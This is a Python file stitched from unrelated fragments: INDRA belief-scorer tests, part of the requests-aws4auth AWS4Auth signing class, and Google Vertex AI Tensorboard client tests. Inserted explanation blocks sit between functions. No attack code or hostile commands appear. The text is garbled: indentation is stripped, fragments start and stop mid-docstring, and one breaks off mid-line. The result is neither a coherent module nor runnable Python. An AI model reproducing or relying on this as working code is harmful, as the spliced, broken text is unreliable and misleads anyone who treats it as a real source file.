with open(test_stmt_cur_path, 'rb') as f:
test_stmts_cur, y_arr_stmts_cur = pickle.load(f)
with open(test_df_path, 'rb') as f:
test_df, y_arr_df = pickle.load(f)
# A set of statements derived from Signor used for testing purposes.
def _dump_test_data(filename, num_per_type=10):
"""Get corpus of statements for testing that has a range of stmt types."""
sp = signor.process_from_web()
# Group statements by type
stmts_by_type = defaultdict(list)
for stmt in sp.statements:
stmts_by_type[stmt.__class__].append(stmt)
# Sample statements of each type (without replacement)
stmt_sample = []
for stmt_type, stmt_list in stmts_by_type.items():
if len(stmt_list) <= num_per_type:
stmt_sample.extend(stmt_list)
else:
stmt_sample.extend(random.sample(stmt_list, num_per_type))
# Make a random binary class vector for the stmt list
y_arr = [random.choice((0, 1)) for s in stmt_sample]
with open(test_stmt_path, 'wb') as f:
pickle.dump((stmt_sample, y_arr), f)
return stmt_sample
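The group-then-sample strategy used in `_dump_test_data` can be sketched with plain strings standing in for INDRA Statements (the items and the per-type cap of 2 are illustrative):

```python
import random
from collections import defaultdict

items = ["a1", "a2", "a3", "b1"]  # stand-ins for statements; first char is the "type"
by_type = defaultdict(list)
for item in items:
    by_type[item[0]].append(item)

# Take every item from small groups, and sample without replacement from
# groups larger than the per-type cap.
num_per_type = 2
sample = []
for group in by_type.values():
    if len(group) <= num_per_type:
        sample.extend(group)
    else:
        sample.extend(random.sample(group, num_per_type))
```

This keeps rare statement types fully represented while bounding the contribution of common ones.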
def test_counts_wrapper():
"""Instantiate counts wrapper and make stmt matrix"""
lr = LogisticRegression()
source_list = ['reach', 'sparser']
cw = CountsScorer(lr, source_list)
# Made this so it's not a ValueError, this may change back in the future
# depending on how we want to handle sources in statement data not seen
# in training.
# @raises(ValueError)
def test_missing_source():
"""Check that all source_apis in training data are in source list."""
lr = LogisticRegression()
source_list = ['reach', 'sparser']
cw = CountsScorer(lr, source_list)
# Should error because test stmts are from signor and signor
# is not in list
cw.stmts_to_matrix(test_stmts)
def test_stmts_to_matrix():
"""Check that all source_apis in training data are in source list."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
x_arr = cw.stmts_to_matrix(test_stmts)
assert isinstance(x_arr, np.ndarray), 'x_arr should be a numpy array'
assert x_arr.shape == (len(test_stmts), len(source_list)), \
'stmt matrix dimensions should match test stmts'
assert set(x_arr.sum(axis=0)) == {0, len(test_stmts)}, \
'Signor col should be 1 in every row, other cols 0.'
# Try again with statement type
cw = CountsScorer(lr, source_list, use_stmt_type=True)
num_types = len(cw.stmt_type_map)
x_arr = cw.stmts_to_matrix(test_stmts)
assert x_arr.shape == (len(test_stmts), len(source_list) + num_types), \
'matrix should have a col for sources and other cols for every ' \
'statement type.'
def test_fit_stmts():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
cw.fit(test_stmts, y_arr_stmts)
# Once the model is fit, the coef_ attribute should be defined
assert 'coef_' in cw.model.__dict__
def test_fit_stmts_predict_stmts():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
cw.fit(test_stmts, y_arr_stmts)
probs = cw.predict_proba(test_stmts)
assert probs.shape == (len(test_stmts), 2), \
'prediction results should have dimension (# stmts, # classes)'
log_probs = cw.predict_log_proba(test_stmts)
assert log_probs.shape == (len(test_stmts), 2), \
'prediction results should have dimension (# stmts, # classes)'
preds = cw.predict(test_stmts)
assert preds.shape == (len(test_stmts),), \
'prediction results should have dimension (# stmts)'
@raises(ValueError)
def test_check_df_cols_err():
"""Drop a required column and make sure we get a ValueError."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
cw.df_to_matrix(test_df.drop('stmt_type', axis=1))
def test_check_df_cols_noerr():
"""Test dataframe should not raise ValueError."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
cw.df_to_matrix(test_df)
def test_df_to_matrix():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
x_arr = cw.df_to_matrix(test_df)
assert isinstance(x_arr, np.ndarray), 'x_arr should be a numpy array'
assert x_arr.shape == (len(test_df), len(source_list)), \
'stmt matrix dimensions should match test stmts'
assert x_arr.shape == (len(test_df), len(source_list))
# Try again with statement type
cw = CountsScorer(lr, source_list, use_stmt_type=True)
num_types = len(cw.stmt_type_map)
x_arr = cw.df_to_matrix(test_df)
assert x_arr.shape == (len(test_df), len(source_list) + num_types), \
'matrix should have a col for sources and other cols for every ' \
'statement type.'
def test_fit_df():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'medscan', 'trips', 'rlimsp']
cw = CountsScorer(lr, source_list)
cw.fit(test_df, y_arr_df)
# Once the model is fit, the coef_ attribute should be defined
assert 'coef_' in cw.model.__dict__
def test_fit_stmts_pred_df():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
# Train on statement data
cw.fit(test_stmts, y_arr_stmts)
# Predict on DF data
probs = cw.predict_proba(test_df)
assert probs.shape == (len(test_df), 2), \
'prediction results should have dimension (# stmts, # classes)'
log_probs = cw.predict_log_proba(test_df)
assert log_probs.shape == (len(test_df), 2), \
'prediction results should have dimension (# stmts, # classes)'
preds = cw.predict(test_df)
assert preds.shape == (len(test_df),), \
'prediction results should have dimension (# stmts)'
def test_fit_df_pred_stmts():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
# Train on statement data
cw.fit(test_df, y_arr_df)
# Predict on DF data
probs = cw.predict_proba(test_stmts)
assert probs.shape == (len(test_stmts), 2), \
'prediction results should have dimension (# stmts, # classes)'
log_probs = cw.predict_log_proba(test_stmts)
assert log_probs.shape == (len(test_stmts), 2), \
'prediction results should have dimension (# stmts, # classes)'
preds = cw.predict(test_stmts)
assert preds.shape == (len(test_stmts),), \
'prediction results should have dimension (# stmts)'
@raises(ValueError)
def test_check_missing_source_counts():
lr = LogisticRegression()
source_list = ['reach', 'sparser']
cw = CountsScorer(lr, source_list)
# Drop the source_counts column
df_no_sc = test_df.drop('source_counts', axis=1)
# Should error
cw.fit(df_no_sc, y_arr_df)
def test_check_source_columns():
lr = LogisticRegression()
source_list = ['reach', 'sparser']
cw = CountsScorer(lr, source_list)
# Drop the source_counts column
df_sc = test_df.drop('source_counts', axis=1)
# Add reach and sparser columns
df_sc['reach'] = 0
df_sc['sparser'] = 0
# Should not error
cw.fit(df_sc, y_arr_df)
def test_matrix_to_matrix():
"""Check that we get a matrix back when passed to to_matrix."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
# Train on statement data
stmt_arr = cw.to_matrix(test_df)
assert cw.to_matrix(stmt_arr) is stmt_arr, \
'If passed a numpy array to_matrix should return it back.'
@raises(ValueError)
def test_use_members_with_df():
"""Check that we can't set use_num_members when passing a DataFrame."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list, use_num_members=True)
# This should error because stmt DataFrame doesn't contain num_members
# info
stmt_arr = cw.to_matrix(test_df)
def test_use_members_with_stmts():
"""Check that we can set use_num_members when passing statements."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list, use_num_members=True)
x_arr = cw.to_matrix(test_stmts)
assert x_arr.shape == (len(test_stmts), len(source_list)+1), \
'stmt matrix dimensions should match test stmts plus num_members'
def setup_belief():
# Make a model
lr = LogisticRegression()
# Get all the sources
source_list = CountsScorer.get_all_sources(test_stmts_cur)
cs = CountsScorer(lr, source_list)
# Train on curated stmt data
cs.fit(test_stmts_cur, y_arr_stmts_cur)
# Run predictions on test statements
probs = cs.predict_proba(test_stmts_cur)[:, 1]
# Now check if we get these same beliefs set on the statements when we
# run with the belief engine:
# Get scorer and belief engine instances for trained model
be = BeliefEngine(scorer=cs)
# Make a shallow copy of the test stmts so that we don't change beliefs
# of the global instances as a side-effect of this test
test_stmts_copy = copy(test_stmts_cur)
return be, test_stmts_copy, probs
def test_set_prior_probs():
# Get probs for a set of statements, and a belief engine instance
be, test_stmts_copy, probs = setup_belief()
# Set beliefs
be.set_prior_probs(test_stmts_copy)
beliefs = [s.belief for s in test_stmts_copy]
# Check that they match
assert np.allclose(beliefs, probs), \
"Statement beliefs should be set to predicted probabilities."
@raises(NotImplementedError)
def test_df_extra_ev_value_error():
"""to_matrix should raise NotImplementError if given a DataFrame and extra
evidence (for now)."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cs = CountsScorer(lr, source_list)
cs.to_matrix(test_df, extra_evidence=[[5]])
@raises(ValueError)
def test_extra_evidence_length():
"""Should raise ValueError because the extra_evidence list is not the
same length as the list of statements."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cs = CountsScorer(lr, source_list)
extra_ev = [[5]]
x_arr = cs.stmts_to_matrix(test_stmts, extra_evidence=extra_ev)
@raises(ValueError)
def test_extra_evidence_content():
"""Should raise ValueError if extra_evidence list entries are not
Evidence objects or empty lists."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cs = CountsScorer(lr, source_list)
extra_ev = ([[5]] * (len(test_stmts) - 1)) + [[]]
x_arr = cs.stmts_to_matrix(test_stmts, extra_evidence=extra_ev)
def test_set_hierarchy_probs():
# Get probs for a set of statements, and a belief engine instance
be, test_stmts_copy, prior_probs = setup_belief()
#
in an unrecognised
format. If one or both of the two headers are present
yet neither are in a format which AWS4Auth recognises
then it will remove both headers and replace with a new
X-Amz-Date header using the current date.
If this behaviour is not wanted, set the
raise_invalid_date keyword argument to True, and
instead an InvalidDateError will be raised when neither
date is recognised. If neither header is present at all
then an X-Amz-Date header will still be added containing
the current date.
See the AWS4Auth class docstring for supported date
formats.
session_token
-- Must be supplied as keyword argument. If session_token
is set, then it is used for the x-amz-security-token
header, for use with STS temporary credentials.
refreshable_credentials
-- A botocore.credentials.RefreshableCredentials instance.
Must be supplied as keyword argument. This instance is
used to generate valid per-request static credentials,
without needing to re-generate the AWS4Auth instance.
If refreshable_credentials is set, the following arguments
are ignored: access_id, secret_key, signing_key,
session_token.
"""
self.signing_key = None
self.refreshable_credentials = kwargs.get('refreshable_credentials', None)
if self.refreshable_credentials:
# instantiate from refreshable_credentials
self.service = kwargs.get('service', None)
if not self.service:
raise TypeError('service must be provided as keyword argument when using refreshable_credentials')
self.region = kwargs.get('region', None)
if not self.region:
raise TypeError('region must be provided as keyword argument when using refreshable_credentials')
self.date = kwargs.get('date', None)
self.default_include_headers.append('x-amz-security-token')
else:
l = len(args)
if l not in [2, 4, 5]:
msg = 'AWS4Auth() takes 2, 4 or 5 arguments, {} given'.format(l)
raise TypeError(msg)
self.access_id = args[0]
if isinstance(args[1], AWS4SigningKey) and l == 2:
# instantiate from signing key
self.signing_key = args[1]
self.region = self.signing_key.region
self.service = self.signing_key.service
self.date = self.signing_key.date
elif l in [4, 5]:
# instantiate from args
secret_key = args[1]
self.region = args[2]
self.service = args[3]
self.date = args[4] if l == 5 else None
self.regenerate_signing_key(secret_key=secret_key)
else:
raise TypeError()
self.session_token = kwargs.get('session_token')
if self.session_token:
self.default_include_headers.append('x-amz-security-token')
raise_invalid_date = kwargs.get('raise_invalid_date', False)
if raise_invalid_date in [True, False]:
self.raise_invalid_date = raise_invalid_date
else:
raise ValueError('raise_invalid_date must be True or False in AWS4Auth.__init__()')
self.include_hdrs = kwargs.get('include_hdrs',
self.default_include_headers)
AuthBase.__init__(self)
def regenerate_signing_key(self, secret_key=None, region=None,
service=None, date=None):
"""
Regenerate the signing key for this instance. Store the new key in
signing_key property.
Take scope elements of the new key from the equivalent properties
(region, service, date) of the current AWS4Auth instance. Scope
elements can be overridden for the new key by supplying arguments to
this function. If overrides are supplied update the current AWS4Auth
instance's equivalent properties to match the new values.
If secret_key is not specified use the value of the secret_key property
of the current AWS4Auth instance's signing key. If the existing signing
key is not storing its secret key (i.e. store_secret_key was set to
False at instantiation) then raise a NoSecretKeyError and do not
regenerate the key. In order to regenerate a key which is not storing
its secret key, secret_key must be supplied to this function.
Use the value of the existing key's store_secret_key property when
generating the new key. If there is no existing key, then default
to setting store_secret_key to True for new key.
"""
if secret_key is None and (self.signing_key is None or
self.signing_key.secret_key is None):
raise NoSecretKeyError
secret_key = secret_key or self.signing_key.secret_key
region = region or self.region
service = service or self.service
date = date or self.date
if self.signing_key is None:
store_secret_key = True
else:
store_secret_key = self.signing_key.store_secret_key
self.signing_key = AWS4SigningKey(secret_key, region, service, date,
store_secret_key)
self.region = region
self.service = service
self.date = self.signing_key.date
def __call__(self, req):
"""
Interface used by Requests module to apply authentication to HTTP
requests.
Add x-amz-content-sha256 and Authorization headers to the request. Add
x-amz-date header to request if not already present and req does not
contain a Date header.
Check request date matches date in the current signing key. If not,
regenerate signing key to match request date.
If request body is not already encoded to bytes, encode to charset
specified in Content-Type header, or UTF-8 if not specified.
req -- Requests PreparedRequest object
"""
if self.refreshable_credentials:
# generate per-request static credentials
self.refresh_credentials()
# check request date matches scope date
req_date = self.get_request_date(req)
if req_date is None:
# no date headers or none in recognisable format
# replace them with x-amz-header with current date and time
if 'date' in req.headers: del req.headers['date']
if 'x-amz-date' in req.headers: del req.headers['x-amz-date']
now = datetime.datetime.utcnow()
req_date = now.date()
req.headers['x-amz-date'] = now.strftime('%Y%m%dT%H%M%SZ')
req_scope_date = req_date.strftime('%Y%m%d')
if req_scope_date != self.date:
self.handle_date_mismatch(req)
# encode body and generate body hash
if hasattr(req, 'body') and req.body is not None:
self.encode_body(req)
content_hash = hashlib.sha256(req.body)
else:
content_hash = hashlib.sha256(b'')
req.headers['x-amz-content-sha256'] = content_hash.hexdigest()
if self.session_token:
req.headers['x-amz-security-token'] = self.session_token
# generate signature
result = self.get_canonical_headers(req, self.include_hdrs)
cano_headers, signed_headers = result
cano_req = self.get_canonical_request(req, cano_headers,
signed_headers)
sig_string = self.get_sig_string(req, cano_req, self.signing_key.scope)
sig_string = sig_string.encode('utf-8')
hsh = hmac.new(self.signing_key.key, sig_string, hashlib.sha256)
sig = hsh.hexdigest()
auth_str = 'AWS4-HMAC-SHA256 '
auth_str += 'Credential={}/{}, '.format(self.access_id,
self.signing_key.scope)
auth_str += 'SignedHeaders={}, '.format(signed_headers)
auth_str += 'Signature={}'.format(sig)
req.headers['Authorization'] = auth_str
return req
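The final signing step in `__call__` is a single HMAC-SHA256 over the string to sign; a minimal sketch with a stand-in signing key and a hypothetical string to sign (both placeholders, not real credentials):

```python
import hashlib
import hmac

signing_key = b"\x01" * 32  # stand-in for AWS4SigningKey.key
sig_string = "AWS4-HMAC-SHA256\n20150830T123600Z\n..."  # hypothetical string to sign

# The hex digest of this HMAC is the value placed in the Signature= field
# of the Authorization header.
sig = hmac.new(signing_key, sig_string.encode("utf-8"), hashlib.sha256).hexdigest()
```

The digest is always a 64-character lowercase hex string, regardless of the inputs.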
def refresh_credentials(self):
temporary_creds = self.refreshable_credentials.get_frozen_credentials()
self.access_id = temporary_creds.access_key
self.session_token = temporary_creds.token
self.regenerate_signing_key(secret_key=temporary_creds.secret_key)
@classmethod
def get_request_date(cls, req):
"""
Try to pull a date from the request by looking first at the
x-amz-date header, and if that's not present then the Date header.
Return a datetime.date object, or None if neither date header
is found or is in a recognisable format.
req -- a requests PreparedRequest object
"""
date = None
for header in ['x-amz-date', 'date']:
if header not in req.headers:
continue
try:
date_str = cls.parse_date(req.headers[header])
except DateFormatError:
continue
try:
date = datetime.datetime.strptime(date_str, '%Y-%m-%d').date()
except ValueError:
continue
else:
break
return date
@staticmethod
def parse_date(date_str):
"""
Check if date_str is in a recognised format and return an ISO
yyyy-mm-dd format version if so. Raise DateFormatError if not.
Recognised formats are:
* RFC 7231 (e.g. Mon, 09 Sep 2011 23:36:00 GMT)
* RFC 850 (e.g. Sunday, 06-Nov-94 08:49:37 GMT)
* C time (e.g. Wed Dec 4 00:00:00 2002)
* Amz-Date format (e.g. 20090325T010101Z)
* ISO 8601 / RFC 3339 (e.g. 2009-03-25T10:11:12.13-01:00)
date_str -- Str containing a date and optional time
"""
months = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug',
'sep', 'oct', 'nov', 'dec']
formats = {
# RFC 7231, e.g. 'Mon, 09 Sep 2011 23:36:00 GMT'
r'^(?:\w{3}, )?(\d{2}) (\w{3}) (\d{4})\D.*$':
lambda m: '{}-{:02d}-{}'.format(
m.group(3),
months.index(m.group(2).lower())+1,
m.group(1)),
# RFC 850 (e.g. Sunday, 06-Nov-94 08:49:37 GMT)
# assumes current century
r'^\w+day, (\d{2})-(\w{3})-(\d{2})\D.*$':
lambda m: '{}{}-{:02d}-{}'.format(
str(datetime.date.today().year)[:2],
m.group(3),
months.index(m.group(2).lower())+1,
m.group(1)),
# C time, e.g. 'Wed Dec 4 00:00:00 2002'
r'^\w{3} (\w{3}) (\d{1,2}) \d{2}:\d{2}:\d{2} (\d{4})$':
lambda m: '{}-{:02d}-{:02d}'.format(
m.group(3),
months.index(m.group(1).lower())+1,
int(m.group(2))),
# x-amz-date format dates, e.g. 20100325T010101Z
r'^(\d{4})(\d{2})(\d{2})T\d{6}Z$':
lambda m: '{}-{}-{}'.format(*m.groups()),
# ISO 8601 / RFC 3339, e.g. '2009-03-25T10:11:12.13-01:00'
r'^(\d{4}-\d{2}-\d{2})(?:[Tt].*)?$':
lambda m: m.group(1),
}
out_date = None
for regex, xform in formats.items():
m = re.search(regex, date_str)
if m:
out_date = xform(m)
break
if out_date is None:
raise DateFormatError
else:
return out_date
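The format table above pairs each recognised date layout with a regex and a normaliser lambda. As a quick standalone check, here is a sketch applying two of those same patterns outside the class:

```python
import re

# Amz-Date pattern from the table, e.g. '20090325T010101Z'
amz = re.search(r'^(\d{4})(\d{2})(\d{2})T\d{6}Z$', '20090325T010101Z')
assert '{}-{}-{}'.format(*amz.groups()) == '2009-03-25'

# RFC 7231 pattern from the table, e.g. 'Mon, 09 Sep 2011 23:36:00 GMT'
months = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug',
          'sep', 'oct', 'nov', 'dec']
rfc = re.search(r'^(?:\w{3}, )?(\d{2}) (\w{3}) (\d{4})\D.*$',
                'Mon, 09 Sep 2011 23:36:00 GMT')
assert '{}-{:02d}-{}'.format(rfc.group(3),
                             months.index(rfc.group(2).lower()) + 1,
                             rfc.group(1)) == '2011-09-09'
```

Every normaliser emits the same `yyyy-mm-dd` shape, which is what lets `get_request_date` parse the result with a single `strptime` format.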
def handle_date_mismatch(self, req):
"""
Handle a request whose date doesn't match the signing key scope date.
This AWS4Auth class implementation regenerates the signing key. See
StrictAWS4Auth class if you would prefer an exception to be raised.
req -- a requests prepared request object
"""
        req_date = self.get_request_date(req)
        new_key_date = req_date.strftime('%Y%m%d')
self.regenerate_signing_key(date=new_key_date)
@staticmethod
def encode_body(req):
"""
Encode body of request to bytes and update content-type if required.
If the body of req is Unicode then encode to the charset found in
content-type header if present, otherwise UTF-8, or ASCII if
content-type is application/x-www-form-urlencoded. If encoding to UTF-8
then add charset to content-type. Modifies req directly, does not
return a modified copy.
req -- Requests PreparedRequest object
"""
if isinstance(req.body, text_type):
split = req.headers.get('content-type', 'text/plain').split(';')
if len(split) == 2:
ct, cs = split
cs = cs.split('=')[1]
req.body = req.body.encode(cs)
else:
ct = split[0]
if (ct == 'application/x-www-form-urlencoded' or
'x-amz-' in ct):
req.body = req.body.encode()
else:
req.body = req.body.encode('utf-8')
req.headers['content-type'] = ct + '; charset=utf-8'
def get_canonical_request(self, req, cano_headers, signed_headers):
"""
Create the AWS authentication Canonical | |
    # Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.GetTensorboardRunRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, tensorboard_run.TensorboardRun)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.description == "description_value"
assert response.etag == "etag_value"
def test_get_tensorboard_run_from_dict():
test_get_tensorboard_run(request_type=dict)
def test_get_tensorboard_run_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
client.get_tensorboard_run()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.GetTensorboardRunRequest()
@pytest.mark.asyncio
async def test_get_tensorboard_run_async(
transport: str = "grpc_asyncio",
request_type=tensorboard_service.GetTensorboardRunRequest,
):
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
tensorboard_run.TensorboardRun(
name="name_value",
display_name="display_name_value",
description="description_value",
etag="etag_value",
)
)
response = await client.get_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.GetTensorboardRunRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, tensorboard_run.TensorboardRun)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.description == "description_value"
assert response.etag == "etag_value"
@pytest.mark.asyncio
async def test_get_tensorboard_run_async_from_dict():
await test_get_tensorboard_run_async(request_type=dict)
def test_get_tensorboard_run_field_headers():
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = tensorboard_service.GetTensorboardRunRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
call.return_value = tensorboard_run.TensorboardRun()
client.get_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_tensorboard_run_field_headers_async():
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = tensorboard_service.GetTensorboardRunRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
tensorboard_run.TensorboardRun()
)
await client.get_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_tensorboard_run_flattened():
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = tensorboard_run.TensorboardRun()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_tensorboard_run(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_tensorboard_run_flattened_error():
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_tensorboard_run(
tensorboard_service.GetTensorboardRunRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_tensorboard_run_flattened_async():
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
tensorboard_run.TensorboardRun()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_tensorboard_run(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_tensorboard_run_flattened_error_async():
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_tensorboard_run(
tensorboard_service.GetTensorboardRunRequest(), name="name_value",
)
def test_update_tensorboard_run(
transport: str = "grpc",
request_type=tensorboard_service.UpdateTensorboardRunRequest,
):
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_tensorboard_run), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = gca_tensorboard_run.TensorboardRun(
name="name_value",
display_name="display_name_value",
description="description_value",
etag="etag_value",
)
response = client.update_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.UpdateTensorboardRunRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_tensorboard_run.TensorboardRun)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.description == "description_value"
assert response.etag == "etag_value"
def test_update_tensorboard_run_from_dict():
test_update_tensorboard_run(request_type=dict)
def test_update_tensorboard_run_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_tensorboard_run), "__call__"
) as call:
client.update_tensorboard_run()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.UpdateTensorboardRunRequest()
@pytest.mark.asyncio
async def test_update_tensorboard_run_async(
transport: str = "grpc_asyncio",
request_type=tensorboard_service.UpdateTensorboardRunRequest,
):
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_tensorboard_run), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_tensorboard_run.TensorboardRun(
name="name_value",
display_name="display_name_value",
description="description_value",
etag="etag_value",
)
)
response = await client.update_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.UpdateTensorboardRunRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_tensorboard_run.TensorboardRun)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.description == "description_value"
assert response.etag == "etag_value"
@pytest.mark.asyncio
async def test_update_tensorboard_run_async_from_dict():
await test_update_tensorboard_run_async(request_type=dict)
def test_update_tensorboard_run_field_headers():
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = tensorboard_service.UpdateTensorboardRunRequest()
request.tensorboard_run.name = "tensorboard_run.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_tensorboard_run), "__call__"
) as call:
call.return_value = gca_tensorboard_run.TensorboardRun()
client.update_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"tensorboard_run.name=tensorboard_run.name/value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_tensorboard_run_field_headers_async():
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = tensorboard_service.UpdateTensorboardRunRequest()
request.tensorboard_run.name = "tensorboard_run.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_tensorboard_run), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_tensorboard_run.TensorboardRun()
)
await client.update_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"tensorboard_run.name=tensorboard_run.name/value",
) in kw["metadata"]
def test_update_tensorboard_run_flattened():
client = TensorboardServiceClient(
